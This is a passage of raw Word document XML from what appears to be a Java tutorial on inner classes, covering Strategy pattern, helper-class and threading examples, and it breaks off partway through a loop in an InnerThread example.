      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w: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68E07D4A"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648940"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">strategy </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0733754D"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648940"/>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5C27B049"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648940"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A2CBE3"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648940"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> executeStrategy</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w: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7574CED4"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648940"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2F9587"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648940"/>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45880EEB"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648940"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB13407"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648940"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Strategy</w:t>
      </w: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1C259E2D"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648940"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> execute</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A31EF93"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648940"/>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18C0C255"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648940"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EBE7E2"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648940"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ConcreteStrategyA</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>implements</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Strategy</w:t>
      </w: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362B9B00"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648940"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> execute</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w: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41E616EE"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648940"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Executing strategy A"</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330A90B0"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648940"/>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375D7CD1"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648940"/>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05E1160A" w14:textId="5C6841D0"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648940"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4235A599" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E488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7. Helper and Utility Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1EA7B7" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39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ner classes are often used as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>helper</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utility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> classes within a larger class. These classes are used to perform specific tasks that are needed only within the outer class, and they do not need to be exposed to other classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7614D5BE" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E488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8. Threading and Runnable Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1858D80E" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ner classes are useful for implementing </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>threads</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runnable tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when the task is tightly coupled with the outer class and needs to access the outer class’s data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236558A5" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="0023650C" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ED3911"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136733"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OuterClass</w:t>
      </w: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52B3182B"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136733"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> count </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB2FF0A"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136733"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEEFF2B"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136733"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InnerThread</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extends</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w: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57BFFAF9"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136733"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> run</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w: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7B0C00F0"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136733"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
